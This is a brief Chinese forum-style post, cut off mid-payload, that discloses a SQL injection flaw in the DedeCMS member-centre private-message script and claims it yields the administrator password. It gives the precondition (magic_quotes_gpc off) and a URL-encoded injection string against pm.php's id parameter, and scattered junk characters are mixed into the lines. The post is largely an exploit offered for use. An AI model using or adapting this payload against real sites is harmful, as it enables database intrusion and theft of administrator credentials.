需要:magic_quotes_gpc = Off
' ?- N# T7 M/ z# i9 C& d8 kDedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等4 j S M. A9 V
看到微博上有人提了下,偶也发鸡肋了.$ m, Z% E3 S# _5 ?# V
http://bt/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28 |